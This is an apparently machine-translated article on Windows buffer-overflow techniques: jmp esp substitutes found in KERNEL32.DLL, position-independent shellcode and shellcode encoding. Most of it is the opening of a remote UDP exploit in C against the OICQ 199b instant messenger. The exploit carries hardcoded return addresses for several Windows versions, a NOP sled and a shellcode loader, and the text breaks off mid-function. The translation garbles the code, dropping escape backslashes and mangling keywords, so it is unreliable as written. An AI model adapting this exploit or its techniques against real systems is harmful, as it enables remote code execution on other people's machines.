Overflow programming skills in WINDOWS

Once accused by cnns of being plagiarized, see blind tone for specific events.

 

 

Overflow programming skills in WINDOWS
Author: Yuan Ge
 
After reading some overflow programs in WINDOWS, I felt that they were not uniform and perfect. I decided to write a relatively unified method and tried to solve some problems.
 
1. jmp esp problems.
KERNERL32 is used to ensure consistency. DLL code, because at least the same system KERNEL32. The DLL module load address may be small,
Other modules may vary with the installation address of the application software environment, and the module installation is KERNEL32. DLL is at the beginning of comparison, followed
The module installation address changes with the changes of the previous module, so it is decided to use KERNEL32. Relatively unified DLL (that is, different versions of the same system)
). Solved the problem that jmp esp (FF E4) code could not be found.
Push esp (54)
....
RET (C3)
Or
Push esp (54)
....
RET 00XX (C2 XX 00) (ret num, NUM should not be too large, so limit NUM = 00XX)
Code, which can be found a lot. "..." Is a few indefinite statements, but does not affect the function.
For example, you can find a code:
PUSH ESP
And al, 08
RET 10
Use the available modules as much as possible, because the same versions may be large.
Because 9X is very different from the loading address of the NT system module, it is impossible to use this method in a unified manner. I have read that WINNT and WIN2000 are actually
KERNEL32. The DLL loading address is different .... For specific program overflow, try to find the jmp esp in the program,
However, this address is usually 0X00XXXXXX, so there are also problems. Can this identify the system to attack in the program first? The following program is
Use a macro.
 
2. Solve the SHELLCODE compiling problem.
It turns out that the SHELLCODE of many programs is written first and then written in the form of "XAAXBB". One is not easy to modify, but also hard to understand.
What is SHELLCODE. So the idea is to write SHELLCODE together with the overflow program. This requires a little writing of SHELLCODE.
It requires that the SHELLCODE code is a movable code, that is, the entire Code address is moved and runs as usual. To reduce incompatibility, the function call address is also used
LOADLIBRARY and GETPROCADDRESS are obtained, so that SHELLCODE only relies on these two parameters. In fact, these two parameters can also be stored in the memory.
And find KERNEL32. DLL module, and then get the address according to the function export table. In this way, only jmp esp addresses are available in WINNT, WIN200, and WIN9X.
There is no unification under.
The SHELLCODE prototype has been roughly introduced in the program. There are several problems:
1. Determine the SHELLCODE Function Code address, and directly specify the jmp shellcode address. You should have a method to get it directly.
2. After SHELLCODE is compiled in C, there is often a call to _ CHKESP, which can be compiled in assembly or found in call _ CHKESP
The code is filled with NOP.
 
3. The SHELLCODE character is usually required, and the SHELLCODE encoding is decided. The SHELLCODE is decoded using a short code before, and the code is compliant with the requirements.
SHELLCODE, which reduces the requirements for SHELLCODE writing. Different requirements mainly rewrite this code segment.
 

/* Oicq 199b build 0220 overflow program
Copy by yuange <yuange@163.net> 2000. 04. 18
The new version 0410 has a heap overflow, which can be exploited, but cannot execute SELLCODE.
*/

# Include <windows. h>
# Include <winsock. h>
# Include <stdio. h>
# Define NUKEWIN2000
// # Define NUKEWIN9X
# Ifdef NUKEWIN2000
# Define RETEIPADDR eipwin2000
# Define LoadLibraryfnaddress 0x77e78023 // 0x77E60000 + 0x00018023 LoadLibrary
# Define GetProcAddressfnaddress 0x77e7564b // 0X77E60000 + 0x0001564B GetProcAddress
# Else
# Ifdef NUKEWIN9X
# Define RETEIPADDR eipwin9x
# Define LoadLibraryfnaddress 0xbff77750 // 0xbff70000 + 0x00007750 LoadLibrary
# Define GetProcAddressfnaddress 0xbff76e28 // 0xbff70000 + 0x00006e28 GetProcAddress
# Else
# Define RETEIPADDR eipwinnt
# Define LoadLibraryfnaddress 0x77EE391A // 0x77ED0000 + 0x0001391A LoadLibrary
# Define GetProcAddressfnaddress 0x77eE4111 // 0x77ED0000 + 0x00014111 GetProcAddress
# Endif
# Endif
# Define NOPCODE 0x90
# Define BUFFSIZE 0x2000
# Define OICQPORT 4000
# Define OICQOVERADD 7 + 0x41C
# Define OVERADD OICQOVERADD
# Define STR0 0
# Define STR1 11
# Define STR2 23
# Define STR3 33
# Define STR4 39
# Define STR5 51
 
Void shellcodefnlock ();
Void shellcodefn ();
Void cleanchkesp (char * fnadd, char * shellbuff, char * chkespadd, int len );
 
Int main (int argc, char ** argv)
{
Char * server;
Char * str = "user32.dll" "x0" "MessageBoxA" "x0" "secuess" "x0" "OK! "" X0 "" msvcrtd. dll "" x0 "" exit "" x0 ";
Char buff1 [] = "x02x01x07x00x78x11x22x33x33x33x33x33x1fx30x1fx37x35x1f" "2000-4-10" x1f "" 12:00:00 "x1f ";
/* Oicq udp head */
 
// 0x77ed0000 + 0x1ddd4 kernel32.dll // push esp // and al, 08 // ret 0c
Char eipwinnt [] = "xd4xddxeex77"; // 0x77ed0000 + 0x0001ddd4
 
Char eipwin2000 [] = "xeax17xe8x77"; // 0x77e60000 + 0x000217ea
// Kernel32.dll // push esp // and al, 08 // ret 0c
 
// 0x77e2e32a user32.dll JMP ESP
Char eip2win2000 [] = "x2axe3xe2x77"; // 0x77df0000 + 0x0003e32a
Char eipwin9x [] = "xd9x6axf7xbf"; // 0xbff70000 + 0x00006ad9
// Kernel32.dll 4.10.2184 0xbff70000 + 0x0006ad9
// Push esp // and al, 0x10; // ret 0x10;
 
Char buff [BUFFSIZE];
Char shellcodebuff [0x1000];
Struct sockaddr_in s_in2, s_in3;
Struct hostent * he;
Char * shellcodefnadd, * chkespadd;
Unsigned int sendpacketlong;
Unsigned int I, j, k;
Unsigned char temp;
Int fd;
U_short port, port1;
SOCKET d_ip;
WSADATA wsaData;
 
Int result = WSAStartup (MAKEWORD (1, 1), & wsaData );
If (result! = 0 ){
Fprintf (stderr, "Your computer was not connected"
"To the Internet at the time that"
"This program was launched, or you"
"Do not have a 32-bit"
"Connection to the Internet .");
Exit (1 );
}
 
If (argc <2)
{
WSACleanup ();
Fprintf (stderr, "nuke oicq. copy by yuange 2000.4.1. wellcome to my homepage http://yuange.yeah.net .");
Fprintf (stderr, "usage: % s <server> [port]", argv [0]);
Exit (1 );
}
Else server = argv [1];
 
D_ip = inet_addr (server );
If (d_ip =-1 ){
He = gethostbyname (server );
If (! He)
{
WSACleanup ();
Printf ("Cant get the ip of % s! ", Server );
Exit (1 );
}
Else memcpy (& d_ip, he-> h_addr, 4 );
}
If (argc> 2) port = atoi (argv [2]);
Else port = OICQPORT;
If (port = 0) port = OICQPORT;
 
Fd = socket (AF_INET, SOCK_DGRAM, 0 );
I = 8000;
Setsockopt (fd, SOL_SOCKET, SO_RCVTIMEO, (const char *) & I, sizeof (I ));
S_in2.sin_family = AF_INET;
If (argc> 3) port1 = atoi (argv [3]);
Else port1 = OICQPORT;
If (port1 = 0) port1 = OICQPORT;
S_in2.sin_port = htons (port1 );
S_in2.sin_addr.s_addr = 0;
 
S_in3.sin_family = AF_INET;
S_in3.sin_port = htons (port );
S_in3.sin_addr.s_addr = d_ip;
Bind (fd, (const struct sockaddr FAR *) & s_in2, sizeof (struct sockaddr_in ));
Printf ("nuke ip: % s port % d", inet_ntoa (s_in3.sin_addr), htons (s_in3.sin_port ));
 
Memset (buff, NOPCODE, BUFFSIZE );
Memcpy (buff, buff1, 37 );
 
_ Asm {
Mov ESI, ESP
Cmp ESI, ESP
}
_ Chkesp ();
Chkespadd = _ chkesp;
Temp = * chkespadd;
If (temp = 0xe9 ){
++ Chkespadd;
// (Int *) I = (int *) * chkespadd;
_ Asm {
Mov EDI, dword ptr [chkespadd]
Mov EDI, [EDI]
Mov I, EDI
}
Chkespadd + = I;
Chkespadd + = 4;
}
 
Shellcodefnadd = shellcodefnlock;
Temp = * shellcodefnadd;
If (temp = 0xe9 ){
++ Shellcodefnadd;
// (Int *) k = (int *) * shellcodefnadd;
_ Asm {
Mov EDI, dword ptr [shellcodefnadd]
Mov EDI, [EDI]
Mov k, EDI
}
Shellcodefnadd + = k;